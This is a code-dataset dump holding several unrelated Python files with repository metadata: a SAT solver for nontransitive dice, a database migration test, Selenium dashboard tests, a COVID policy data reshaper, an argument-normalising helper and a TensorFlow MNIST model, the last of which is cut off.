hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7720601585c87e81f391830224a24710fc679947
| 11,203
|
py
|
Python
|
utils.py
|
michaelpatrickpurcell/balanced-nontransitive-dice
|
d4d6e4cfc282d65edd10e9ff0219615c5ac2b77b
|
[
"MIT"
] | null | null | null |
utils.py
|
michaelpatrickpurcell/balanced-nontransitive-dice
|
d4d6e4cfc282d65edd10e9ff0219615c5ac2b77b
|
[
"MIT"
] | null | null | null |
utils.py
|
michaelpatrickpurcell/balanced-nontransitive-dice
|
d4d6e4cfc282d65edd10e9ff0219615c5ac2b77b
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy.special import factorial
from itertools import permutations, product
from pysat.solvers import Minisat22, Minicard
from pysat.pb import PBEnc
from clauses import build_clauses, build_max_min_clauses
from clauses import build_permutation_clauses
from clauses import build_cardinality_lits, build_exclusivity_lits
def compare_dice(first, second):
hits = 0
for x in first:
for y in second:
if y < x:
hits += 1
return hits
def compare_doubled_dice(first, second, comp="max"):
d = len(first)
hits = 0
if comp == "max":
indices = range(1, 2 * d, 2)
if comp == "min":
indices = range(2 * d - 1, 0, -2)
for i, x in zip(indices, first):
for j, y in zip(indices, second):
if y < x:
hits += i * j
return hits
def recover_values(d, dice_names, constraints):
natural_faces = []
for die in dice_names:
faces = np.arange(d)
for die2 in dice_names:
if die != die2:
faces += constraints[(die, die2)].sum(1)
natural_faces.append(faces)
return natural_faces
def compress_values(*args):
T = {}
for i, die in enumerate(args):
T.update({k: i for k in die})
n = len(T.keys())
T_list = [T[i] for i in range(n)]
current_value = 0
current_die = T_list[0]
compressed_dice = [[] for _ in args]
compressed_dice[current_die].append(current_value)
for i in range(1, n):
previous_die = current_die
current_die = T_list[i]
if current_die != previous_die:
current_value += 1
compressed_dice[current_die].append(current_value)
return compressed_dice
def sat_to_constraints(d, dice_names, sat_solution, compress=True):
dice_pairs = list(permutations(dice_names, 2))
n = len(dice_pairs)
signs_array = (sat_solution[: (n * d ** 2)] > 0).reshape((n, d, d))
constraints = {v: s for v, s in zip(dice_pairs, signs_array)}
return constraints
def sat_to_dice(d, dice_names, sat_solution, compress=False):
constraints = sat_to_constraints(d, dice_names, sat_solution)
natural_faces = recover_values(d, dice_names, constraints)
if compress:
dice_faces = compress_values(*natural_faces)
dice_dict = {k: v for k, v in zip(dice_names, dice_faces)}
else:
dice_dict = {k: v for k, v in zip(dice_names, natural_faces)}
return dice_dict
def dice_to_constraints(dice, dtype=np.int):
dice_names = list(dice.keys())
d = len(dice[dice_names[0]])
dice_pairs = list(permutations(dice_names, 2))
n = len(dice_pairs)
constraints = dict()
for x, y in dice_pairs:
foo = np.array(dice[x]).reshape(len(dice[x]), 1)
bar = np.array(dice[y]).reshape(1, len(dice[y]))
constraint = foo > bar
constraints[(x, y)] = constraint.astype(dtype)
return constraints
def dice_to_word(dice_solution):
dice_names = list(dice_solution.keys())
m = len(dice_names)
d = len(dice_solution[dice_names[0]])
foo = [[(x, dice_solution[x][i]) for i in range(d)] for x in dice_names]
bar = sum(foo, [])
ram = sorted(bar, key=lambda x: x[1])
word = "".join([t[0] for t in ram])
segments = [word[i : (i + m)] for i in range(0, m * d, m)]
segmented_word = " ".join(segments)
return word, segmented_word
def word_to_dice(word):
dice_names = set(word)
dice_solution = dict()
for i, w in enumerate(word):
if w in dice_solution:
dice_solution[w].append(i)
else:
dice_solution[w] = [i]
return dice_solution
def permute_letters(string, permutation, relative=True):
letter_set = set(string)
if relative:
pairs = [(string.index(letter), letter) for letter in letter_set]
sorted_pairs = sorted(pairs)
letters = "".join(l for i, l in sorted_pairs)
# letters = string[: len(letter_set)]
else:
letters = sorted(list(set(string)))
subs = {s: letters[p] for s, p in zip(letters, permutation)}
subs_string = "".join([subs[s] for s in string])
return subs_string
# ----------------------------------------------------------------------------
def verify_solution(scores, dice_solution):
for x, y in scores:
check = compare_dice(dice_solution[x], dice_solution[y])
print((x, y), check, scores[(x, y)])
def verify_doubling_solution(
scores, doubled_scores_max, doubled_scores_min, dice_solution
):
verify_solution(scores, dice_solution)
print()
for x, y in doubled_scores_max:
check = compare_doubled_dice(dice_solution[x], dice_solution[y], "max")
print((x, y), check, doubled_scores_max[(x, y)])
print()
for x, y in doubled_scores_min:
check = compare_doubled_dice(dice_solution[x], dice_solution[y], "min")
print((x, y), check, doubled_scores_min[(x, y)])
def verify_go_first(dice_solution, verbose=True):
m = len(dice_solution)
keys = np.array(sorted(list(dice_solution.keys())))
d = len(dice_solution[keys[0]])
check = d ** m // factorial(m, exact=True)
counts = {x: 0 for x in permutations(keys)}
for outcome in product(*[dice_solution[k] for k in keys]):
perm = np.argsort(outcome)
counts[tuple(keys[perm])] += 1
if verbose:
for k in counts:
print(k, check, counts[k])
print()
return counts
# ============================================================================
def build_sat(
d,
dice_names,
scores,
cardinality_clauses=False,
symmetry_clauses=True,
structure_clauses=True,
pb=PBEnc.equals,
):
clauses, cardinality_lits = build_clauses(
d,
dice_names,
scores,
card_clauses=cardinality_clauses,
symmetry_clauses=symmetry_clauses,
structure_clauses=structure_clauses,
)
sat = Minicard()
for clause in clauses:
sat.add_clause(clause)
if not cardinality_clauses:
for x, lits in cardinality_lits.items():
if pb in (PBEnc.equals, PBEnc.atmost):
sat.add_atmost(lits, scores[x])
if pb in (PBEnc.equals, PBEnc.atleast):
conv_lits = [-l for l in lits]
sat.add_atmost(conv_lits, d ** 2 - scores[x])
return sat
def sat_search(
d,
dice_names,
scores,
cardinality_clauses=False,
symmetry_clauses=True,
structure_clauses=True,
pb=PBEnc.equals,
solution_type="dice_solution",
):
sat = build_sat(
d=d,
dice_names=dice_names,
scores=scores,
cardinality_clauses=cardinality_clauses,
symmetry_clauses=symmetry_clauses,
structure_clauses=structure_clauses,
pb=pb,
)
is_solvable = sat.solve()
if is_solvable:
sat_solution = np.array(sat.get_model())
dice_solution = sat_to_dice(d, dice_names, sat_solution, compress=False)
else:
sat_solution = None
dice_solution = None
if solution_type == "sat_solution":
return sat_solution
elif solution_type == "dice_solution":
return dice_solution
# ----------------------------------------------------------------------------
def sat_exhaust(
d,
dice_names,
scores,
cardinality_clauses=False,
symmetry_clauses=True,
structure_clauses=True,
pb=PBEnc.equals,
solution_type="sat_solution",
):
sat = build_sat(
d=d,
dice_names=dice_names,
scores=scores,
cardinality_clauses=cardinality_clauses,
symmetry_clauses=symmetry_clauses,
structure_clauses=structure_clauses,
pb=pb,
)
dice_pairs = list(permutations(dice_names, 2))
n = len(dice_pairs)
solutions = sat.enum_models()
if solution_type == "sat_solution":
return [np.array(s) for s in solutions]
elif solution_type == "dice_solution":
dice_solutions = [sat_to_dice(d, dice_names, np.array(s)) for s in solutions]
return dice_solutions
# ----------------------------------------------------------------------------
def sat_search_max_min(d, dice_names, scores, max_scores, min_scores):
clauses = build_max_min_clauses(d, dice_names, scores, max_scores, min_scores)
sat = Minisat22()
for clause in clauses:
sat.add_clause(clause)
is_solvable = sat.solve()
if is_solvable:
model = np.array(sat.get_model())
sat_solution = np.array(sat.get_model())
dice_solution = sat_to_dice(d, dice_names, sat_solution, compress=False)
else:
dice_solution = None
return dice_solution
# ----------------------------------------------------------------------------
def sat_search_go_first(d, dice_names, scores_2, scores_m, m=None):
if m == None:
m = len(dice_names)
start_enum = 1
dice_pairs = list(permutations(dice_names, 2))
faces = {x: ["%s%i" % (x, i) for i in range(1, d + 1)] for x in dice_names}
# ------------------------------------------------------------------------
var_lists_2 = {(x, y): list(product(faces[x], faces[y])) for (x, y) in dice_pairs}
variables_2 = sum(var_lists_2.values(), [])
var_dict_2 = dict((v, k) for k, v in enumerate(variables_2, start_enum))
start_enum += len(variables_2)
# ------------------------------------------------------------------------
dice_perms = list(permutations(dice_names, m))
var_lists_m = {xs: list(product(*[faces[x] for x in xs])) for xs in dice_perms}
variables_m = sum(var_lists_m.values(), [])
var_dict_m = dict((v, k) for k, v in enumerate(variables_m, start_enum))
start_enum += len(variables_m)
# ------------------------------------------------------------------------
clauses_2, cardinality_lits_2 = build_clauses(d, dice_names, scores_2)
# ------------------------------------------------------------------------
clauses_m = build_permutation_clauses(d, var_dict_2, var_dict_m, dice_names, m)
cardinality_lits_m = build_cardinality_lits(d, var_dict_m, var_lists_m)
exclusivity_lits = build_exclusivity_lits(d, var_dict_m, dice_names, m)
# ------------------------------------------------------------------------
clauses = clauses_2 + clauses_m
sat = Minicard()
for clause in clauses:
sat.add_clause(clause)
for x, lits in cardinality_lits_2.items():
sat.add_atmost(lits, scores_2[x])
conv_lits = [-l for l in lits]
sat.add_atmost(conv_lits, d ** 2 - scores_2[x])
for x, lits in cardinality_lits_m.items():
sat.add_atmost(lits, scores_m[x])
conv_lits = [-l for l in lits]
sat.add_atmost(conv_lits, d ** m - scores_m[x])
for x, lits in exclusivity_lits.items():
sat.add_atmost(lits, 1)
conv_lits = [-l for l in lits]
sat.add_atmost(conv_lits, len(lits) - 1)
is_solvable = sat.solve()
if is_solvable:
sat_solution = np.array(sat.get_model())
dice_solution = sat_to_dice(d, dice_names, sat_solution, compress=False)
else:
dice_solution = None
return dice_solution
| 29.954545
| 86
| 0.595376
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 924
| 0.082478
|
7722bc9189fc79c029275036a7e49a54482e4d8c
| 38
|
py
|
Python
|
pkg/agents/team4/trainingAgent/findBestConfigs.py
|
SOMAS2021/SOMAS2021
|
acaa13e3d663d3f59589f3b26860db643b3bf29e
|
[
"MIT"
] | 13
|
2021-12-02T09:28:47.000Z
|
2022-01-14T18:39:51.000Z
|
pkg/agents/team4/trainingAgent/findBestConfigs.py
|
SOMAS2021/SOMAS2021
|
acaa13e3d663d3f59589f3b26860db643b3bf29e
|
[
"MIT"
] | 190
|
2021-11-19T15:37:44.000Z
|
2022-01-17T00:23:13.000Z
|
pkg/agents/team4/trainingAgent/findBestConfigs.py
|
SOMAS2021/SOMAS2021
|
acaa13e3d663d3f59589f3b26860db643b3bf29e
|
[
"MIT"
] | 4
|
2021-11-22T18:21:53.000Z
|
2021-12-22T13:55:42.000Z
|
# TODO: autmatate finding best agents
| 19
| 37
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 37
| 0.973684
|
772382a62fd85bce40038234f29c973df9cee412
| 2,653
|
py
|
Python
|
tests/storage/psql_dos/migrations/django_branch/test_0043_default_link_label.py
|
mkrack/aiida-core
|
bab1ad6cfc8e4ff041bce268f9270c613663cb35
|
[
"MIT",
"BSD-3-Clause"
] | 153
|
2016-12-23T20:59:03.000Z
|
2019-07-02T06:47:52.000Z
|
tests/storage/psql_dos/migrations/django_branch/test_0043_default_link_label.py
|
mkrack/aiida-core
|
bab1ad6cfc8e4ff041bce268f9270c613663cb35
|
[
"MIT",
"BSD-3-Clause"
] | 2,466
|
2016-12-24T01:03:52.000Z
|
2019-07-04T13:41:08.000Z
|
tests/storage/psql_dos/migrations/django_branch/test_0043_default_link_label.py
|
mkrack/aiida-core
|
bab1ad6cfc8e4ff041bce268f9270c613663cb35
|
[
"MIT",
"BSD-3-Clause"
] | 88
|
2016-12-23T16:28:00.000Z
|
2019-07-01T15:55:20.000Z
|
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Test update of link labels."""
from uuid import uuid4
from aiida.common import timezone
from aiida.storage.psql_dos.migrator import PsqlDostoreMigrator
def test_legacy_jobcalc_attrs(perform_migrations: PsqlDostoreMigrator):
"""Test update of link labels."""
# starting revision
perform_migrations.migrate_up('django@django_0042')
# setup the database
user_model = perform_migrations.get_current_table('db_dbuser')
node_model = perform_migrations.get_current_table('db_dbnode')
link_model = perform_migrations.get_current_table('db_dblink')
with perform_migrations.session() as session:
user = user_model(
email='user@aiida.net',
first_name='John',
last_name='Doe',
institution='EPFL',
)
session.add(user)
session.commit()
node_process = node_model(
uuid=str(uuid4()),
node_type='process.calculation.calcjob.CalcJobNode.',
label='test',
description='',
user_id=user.id,
ctime=timezone.now(),
mtime=timezone.now(),
)
node_data = node_model(
uuid=str(uuid4()),
node_type='data.core.dict.Dict.',
label='test',
description='',
user_id=user.id,
ctime=timezone.now(),
mtime=timezone.now(),
)
session.add(node_process)
session.add(node_data)
session.commit()
link = link_model(
input_id=node_data.id,
output_id=node_process.id,
type='input',
label='_return',
)
session.add(link)
session.commit()
link_id = link.id
# final revision
perform_migrations.migrate_up('django@django_0043')
link_model = perform_migrations.get_current_table('db_dblink')
with perform_migrations.session() as session:
link = session.get(link_model, link_id)
assert link.label == 'result'
| 35.373333
| 75
| 0.551074
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 965
| 0.363739
|
7729ca0d13aba7858c6f6bf672c7c5cb27ab55a0
| 7,901
|
py
|
Python
|
tests/src/SI/MAP/School_Map_regression_testing.py
|
JalajaTR/cQube
|
6bf58ab25f0c36709630987ab730bbd5d9192c03
|
[
"MIT"
] | null | null | null |
tests/src/SI/MAP/School_Map_regression_testing.py
|
JalajaTR/cQube
|
6bf58ab25f0c36709630987ab730bbd5d9192c03
|
[
"MIT"
] | null | null | null |
tests/src/SI/MAP/School_Map_regression_testing.py
|
JalajaTR/cQube
|
6bf58ab25f0c36709630987ab730bbd5d9192c03
|
[
"MIT"
] | null | null | null |
import time
import unittest
from Data.parameters import Data
from SI.MAP.check_infrascore_with_download_functionality import SchoolInfra_scores
from SI.MAP.check_sc_map_clusterwise_records import test_school_map_schoollevel_records
from SI.MAP.click_on_anydistrict_and_download_csv import download_icon
from SI.MAP.click_on_block_cluster_school_and_check_schoolscount import Block_cluster_school_count
from SI.MAP.click_on_blocks import click_on_blocks
from SI.MAP.click_on_blocks_and_scores import block_btn_scores
from SI.MAP.click_on_clusters import cluster_button
from SI.MAP.click_on_clusters_and_scores import cluster_btn_scores
from SI.MAP.click_on_district_and_homeicon import district_home
from SI.MAP.click_on_hyperlink import click_on_hyperlink
from SI.MAP.click_on_infra_score import click_on_infrascores
from SI.MAP.click_on_schools import click_schoolbutton
from SI.MAP.click_on_schools_and_scores import schools_btn_scores
from reuse_func import GetData
class cQube_SI_Map_Report(unittest.TestCase):
@classmethod
def setUpClass(self):
self.data = GetData()
self.driver = self.data.get_driver()
self.data.open_cqube_appln(self.driver)
self.data.login_cqube(self.driver)
time.sleep(2)
self.data.navigate_to_school_infrastructure_map()
time.sleep(3)
def test_hyperlink(self):
b = click_on_hyperlink(self.driver)
res = b.test_link()
if "school-infra-map" in self.driver.current_url:
print("school infra map based report present")
else:
print("home icon is not working ")
def test_districtwise_download(self):
b = download_icon(self.driver)
res = b.test_donwload()
self.assertEqual(0,res,msg="mismatch found at no of school values")
self.data.page_loading(self.driver)
def test_schools_per_cluster_csv_download1(self):
school = test_school_map_schoollevel_records(self.driver)
result = school.check_download_csv1()
if result == 0:
print("Schools per cluster csv download report is working")
print("on selection of each district,block and cluster")
print("The footer value of no of schools and no of students are")
print("equals to downloaded file")
else:
raise self.failureException("Schools per cluster csv report download1 is working")
def test_click_home_in_districtwise(self):
b = district_home(self.driver)
res = b.test_district()
if "school-infra-map" in self.driver.current_url:
print("school infra map based report present")
else:
print("home icon is not working ")
def test_logout(self):
self.driver.find_element_by_xpath(Data.hyper_link).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id(Data.logout).click()
self.data.page_loading(self.driver)
count = 0
print(self.driver.title)
if 'Log in to cQube' in self.driver.title:
print('logout button is working and Login page is displayed')
else:
print("logout button is not working ")
count = count + 1
self.assertEqual(0,count,msg='logout button is not worked')
self.data.login_cqube(self.driver)
self.data.page_loading(self.driver)
self.data.navigate_to_school_infrastructure_map()
self.data.page_loading(self.driver)
def test_infrascore(self):
b = SchoolInfra_scores(self.driver)
infra_score = b.infra_score()
b.remove_csv()
self.assertNotEqual(0, infra_score, msg='Failed')
boy_toilet = b.Boys_toilet_percentage()
b.remove_csv()
self.assertNotEqual(0, boy_toilet, msg='Failed')
drinking_water = b.drinking_water()
b.remove_csv()
self.assertNotEqual(0, drinking_water, msg='Failed')
Electricity = b.Electricity()
b.remove_csv()
self.assertNotEqual(0, Electricity, msg='Failed')
girl_toilet = b.girls_toilet()
b.remove_csv()
self.assertNotEqual(0, girl_toilet, msg='Failed')
Handpump = b.Handpump()
b.remove_csv()
self.assertNotEqual(0, Handpump, msg='Failed')
Handwash = b.Handwash()
b.remove_csv()
self.assertNotEqual(0, Handwash, msg='Failed')
Library = b.Library()
b.remove_csv()
self.assertNotEqual(0, Library, msg='Failed')
Solar_panel = b.Solar_panel()
b.remove_csv()
self.assertNotEqual(0, Solar_panel, msg='Failed')
Tapwater = b.Tapwater()
b.remove_csv()
self.assertNotEqual(0, Tapwater, msg='Failed')
Toilet = b.Toilet()
b.remove_csv()
self.assertNotEqual(0, Toilet, msg='Failed')
def test_infrascores(self):
b = click_on_infrascores(self.driver)
res = b.test_infrascores()
self.assertNotEqual(0, res, msg="infra score options not contains in drop down")
print("checked with infrascores options")
def test_click_on_block_cluster_school(self):
b = click_on_blocks(self.driver)
res1,res2 = b.test_blocks_button()
self.assertNotEqual(0, res1, msg="Records are not present on map ")
self.assertTrue(res2,msg='Block wise file downloading is not working ')
print("Block buttons is working...")
b = cluster_button(self.driver)
res1, res2 = b.test_clusterbtn()
self.assertNotEqual(0, res1, msg="Records are not present on map ")
self.assertTrue(res2, msg='Cluster wise file downloading is not working ')
print("cluster button is working ")
b = click_schoolbutton(self.driver)
res1,res2 = b.test_click_on_school_btn()
self.assertNotEqual(0, res1, msg="Records are not present on map ")
self.assertTrue(res2, msg='School wise file downloading is not working ')
print("school button is working ")
def test_no_of_schools(self):
b = Block_cluster_school_count(self.driver)
r, r1, r2, r3 = b.test_check_total_schoolvalue()
self.assertEqual(int(r), int(r1), msg="mis match found in no of school in block level")
self.assertEqual(int(r), int(r2), msg="mis match found in no of school in cluster level")
self.assertEqual(int(r), int(r3), msg="mis match found in no of school in school level")
self.data.page_loading(self.driver)
print("checked with comapared with footer values ")
def test_block_cluster_schools_infrascores(self):
b = block_btn_scores(self.driver)
result = b.test_click_blocks()
self.data.page_loading(self.driver)
print("block button is worked and infra scores is working ")
b = cluster_btn_scores(self.driver)
result = b.test_click_clusters()
self.data.page_loading(self.driver)
print("cluster button is worked and infra scores is working ")
b = schools_btn_scores(self.driver)
res = b.test_click_schools()
self.data.page_loading(self.driver)
print("school button is worked and infra scores is working ")
def test_homebtn(self):
self.driver.find_element_by_xpath(Data.hyper_link).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id('homeBtn').click()
self.data.page_loading(self.driver)
count = 0
if 'dashboard' in self.driver.current_url:
print("cQube Landing page is displayed ")
else:
print('Homebutton is not working ')
count = count + 1
self.assertEqual(0,count,msg='Landing page does not exists')
self.data.navigate_to_school_infrastructure_map()
self.data.page_loading(self.driver)
@classmethod
def tearDownClass(cls):
cls.driver.close()
| 38.541463
| 98
| 0.678142
| 6,925
| 0.876471
| 0
| 0
| 373
| 0.047209
| 0
| 0
| 1,532
| 0.1939
|
772a4eead684d14c1321c64fcce204b67581646f
| 4,217
|
py
|
Python
|
src/manual/melt_oxcgrt2.py
|
lshtm-gis/WHO_PHSM_Cleaning
|
5892673922fc555fb86d6e0be548b48c7dc66814
|
[
"MIT"
] | null | null | null |
src/manual/melt_oxcgrt2.py
|
lshtm-gis/WHO_PHSM_Cleaning
|
5892673922fc555fb86d6e0be548b48c7dc66814
|
[
"MIT"
] | 123
|
2020-10-12T11:06:27.000Z
|
2021-04-28T15:32:29.000Z
|
src/manual/melt_oxcgrt2.py
|
lshtm-gis/WHO_PHSM_Cleaning
|
5892673922fc555fb86d6e0be548b48c7dc66814
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 3 15:24:46 2020
@author: hamishgibbs
"""
import pandas as pd
import re
import numpy as np
#%%
ox = pd.read_csv('https://raw.githubusercontent.com/OxCGRT/covid-policy-tracker/master/data/OxCGRT_latest_withnotes.csv')
#%%
ox = ox[0:100]
#%%
ox.fillna(0.0, inplace = True)
#%%
def oxcgrt_records(ox, drop_columns = []):
'''
Function to convert OXCGRT data to records
This is an additional challenge because of the wide format of the Oxford data
'''
full_value_names, value_names, stub_names = get_names(ox)
id_columns = [x for x in list(set(ox.columns).difference(set(full_value_names))) if x not in drop_columns]
records = ox.to_dict(orient="records")
rs = [x for x in [get_measure_records(r, stub_names, id_columns) for r in records] if x != []]
rs = [item for sublist in rs for item in sublist]
return(rs)
def get_names(ox):
'''
Function to get names of columns holding measure information.
These columns begin with the prefix "A1_" etc.
returns:
full_value_names: the names of all columns with measure information
value_names: the names of measure columns
stub_names: the measure column prefixes (i.e. "A1")
'''
stub_exp = r'[A-Z][0-9]+_'
full_value_names = [match for match in ox.columns if re.findall(stub_exp , match) != []]
value_names = [x for x in full_value_names if 'Flag' not in x]
value_names = [x for x in value_names if 'Notes' not in x]
stub_names = [x.split('_')[0] for x in value_names]
return(full_value_names, value_names, stub_names)
def get_measure_records(combined_record, stub_names, id_columns):
'''Function to break rows into individual records by stub group
i.e. subset a row for only C4 records and other information, repeat for all possible measures.
Also drops records with no data where sum(all values) == 0
'''
records = []
for stub in stub_names:
stub_keys = [x for x in full_value_names if stub in x]
keys = id_columns + stub_keys
try:
flag_key = [x for x in stub_keys if '_Flag' in x][0]
except:
pass
try:
notes_key = [x for x in stub_keys if '_Notes' in x][0]
except:
pass
subset = {key: value for key, value in combined_record.items() if key in keys}
try:
if sum([subset[key] for key in stub_keys]) == 0:
continue
except:
pass
try:
subset['flag'] = subset.pop(flag_key)
except:
subset['flag'] = 0.0
pass
try:
subset['notes'] = subset.pop(notes_key)
except:
pass
measure_key = list(set(list(subset.keys())).difference(set(id_columns + ['measure_name', 'flag', 'notes'])))
subset['measure'] = subset.pop(measure_key[0])
subset['measure_name'] = measure_key[0]
records.append(subset)
return(records)
#%%
drop_columns = ['ConfirmedCases',
'ConfirmedDeaths', 'StringencyIndex', 'StringencyIndexForDisplay',
'StringencyLegacyIndex', 'StringencyLegacyIndexForDisplay',
'GovernmentResponseIndex', 'GovernmentResponseIndexForDisplay',
'ContainmentHealthIndex', 'ContainmentHealthIndexForDisplay',
'EconomicSupportIndex', 'EconomicSupportIndexForDisplay']
#%%
ox_r = oxcgrt_records(ox, drop_columns)
#%%
len(ox_r)
#%%
keep_columns = list(set(ox.columns).difference(set(drop_columns)))
full_value_names, value_names, stub_names = get_names(ox)
id_columns = [x for x in list(set(ox.columns).difference(set(full_value_names))) if x not in drop_columns]
#%%
records = ox.to_dict(orient="records")
#%%
rs = [x for x in [get_measure_records(r, stub_names, id_columns) for r in records] if x != []]
rs = [item for sublist in rs for item in sublist]
rs = pd.DataFrame(rs)
#%%
| 27.562092
| 121
| 0.609912
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,438
| 0.341001
|
772a5de76c01fda9fdad90cbd5de3085dda181b3
| 2,082
|
py
|
Python
|
src/wildfires/cache/same_call.py
|
akuhnregnier/wildfires
|
4d31cbdd4a1303ecebc391a35c73b8f07d8fe400
|
[
"MIT"
] | 1
|
2021-01-30T15:38:32.000Z
|
2021-01-30T15:38:32.000Z
|
src/wildfires/cache/same_call.py
|
akuhnregnier/wildfires
|
4d31cbdd4a1303ecebc391a35c73b8f07d8fe400
|
[
"MIT"
] | null | null | null |
src/wildfires/cache/same_call.py
|
akuhnregnier/wildfires
|
4d31cbdd4a1303ecebc391a35c73b8f07d8fe400
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Decorator guaranteeing uniform function calls."""
from inspect import Parameter, signature
def extract_uniform_args_kwargs(f, *args, ignore=None, **kwargs):
"""Extract uniform arguments given a function and the parameters it is called with.
Args:
f (callable): Function being called.
*args, **kwargs: Function arguments.
ignored (None or iterable of str): Arguments to ignore. Their corresponding
values will never be returned.
Returns:
args, kwargs: Standardised representation of the given arguments.
"""
if ignore is None:
ignore = set()
sig = signature(f)
name_kind = {p.name: p.kind for p in sig.parameters.values()}
bound_args = sig.bind(*args, **kwargs)
bound_args.apply_defaults()
# Possible argument types:
#
# KEYWORD_ONLY
# POSITIONAL_ONLY
# POSITIONAL_OR_KEYWORD
# VAR_KEYWORD
# VAR_POSITIONAL
#
# Accumulate POSITIONAL_ONLY, POSITIONAL_OR_KEYWORD, and VAR_POSITIONAL in the
# order given in `arguments`.
new_args = []
pos_kind = (
Parameter.POSITIONAL_ONLY,
Parameter.POSITIONAL_OR_KEYWORD,
Parameter.VAR_POSITIONAL,
)
for name, value in bound_args.arguments.items():
if name in ignore:
continue
if name_kind[name] not in pos_kind:
break
if name_kind[name] == Parameter.VAR_POSITIONAL:
new_args.extend(value)
else:
new_args.append(value)
# Accumulate KEYWORD_ONLY and VAR_KEYWORD in the
# order given in `arguments`.
new_kwargs = {}
kw_kind = (Parameter.KEYWORD_ONLY, Parameter.VAR_KEYWORD)
for name, value in bound_args.arguments.items():
if name in ignore:
continue
if name_kind[name] in pos_kind:
continue
assert name_kind[name] in kw_kind
if name_kind[name] == Parameter.VAR_KEYWORD:
new_kwargs.update(value)
else:
new_kwargs[name] = value
return new_args, new_kwargs
| 29.742857
| 87
| 0.64121
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 778
| 0.373679
|
772a5f878a0f88d452d599cf44b77a39b7955775
| 2,862
|
py
|
Python
|
models/mnist_model.py
|
dcurry09/Tensorflow-Project-OOP
|
7b142046cf6d736790029092dc83c0ce0009586b
|
[
"Apache-2.0"
] | null | null | null |
models/mnist_model.py
|
dcurry09/Tensorflow-Project-OOP
|
7b142046cf6d736790029092dc83c0ce0009586b
|
[
"Apache-2.0"
] | null | null | null |
models/mnist_model.py
|
dcurry09/Tensorflow-Project-OOP
|
7b142046cf6d736790029092dc83c0ce0009586b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
"""
Implements a TF Model class by inheriting the Model base class.
@author: David Curry
@version: 1.0
"""
from base.base_model import BaseModel
import tensorflow as tf
class MnistModel(BaseModel):
def __init__(self, config):
"""
Constructor to initialize the TF model class by inheritance from super.
:param config
:return none
:raises none
"""
super(MnistModel, self).__init__(config)
self.build_model()
self.init_saver()
def build_model(self):
"""
Build the Tensorflow model
:param self
:return none
:raises none
"""
batch_size = self.config['batch_size']
self.is_training = tf.placeholder(tf.bool)
# declare the training data placeholders
# input x - for 28 x 28 pixels = 784
self.x = tf.placeholder(tf.float32, [None, 784])
# now declare the output data placeholder - 10 digits
self.y = tf.placeholder(tf.float32, [None, 10])
# now declare the weights connecting the input to the hidden layer
self.W1 = tf.Variable(tf.random_normal([784, 300], stddev=0.03), name='W1')
self.b1 = tf.Variable(tf.random_normal([300]), name='b1')
# and the weights connecting the hidden layer to the output layer
self.W2 = tf.Variable(tf.random_normal([300, 10], stddev=0.03), name='W2')
self.b2 = tf.Variable(tf.random_normal([10]), name='b2')
# calculate the output of the hidden layer
self.hidden_out = tf.add(tf.matmul(self.x, self.W1), self.b1)
self.hidden_out = tf.nn.relu(self.hidden_out)
# now calculate the hidden layer output - in this case, let's use a softmax activated output layer
self.y_ = tf.nn.softmax(tf.add(tf.matmul(self.hidden_out, self.W2), self.b2))
# define the loss function
self.y_clipped = tf.clip_by_value(self.y_, 1e-10, 0.9999999)
self.cross_entropy = -tf.reduce_mean(tf.reduce_sum(self.y * tf.log(self.y_clipped) + (1 - self.y) * tf.log(1 - self.y_clipped), axis=1))
# add an optimiser
self.optimiser = tf.train.GradientDescentOptimizer(learning_rate=self.config['learning_rate']).minimize(self.cross_entropy)
# define an accuracy assessment operation
self.correct_prediction = tf.equal(tf.argmax(self.y, 1), tf.argmax(self.y_, 1))
self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, tf.float32))
def init_saver(self):
"""
Initialize the tensorflow saver that will be used in saving the checkpoints.
:param self
:return none
:raises none
"""
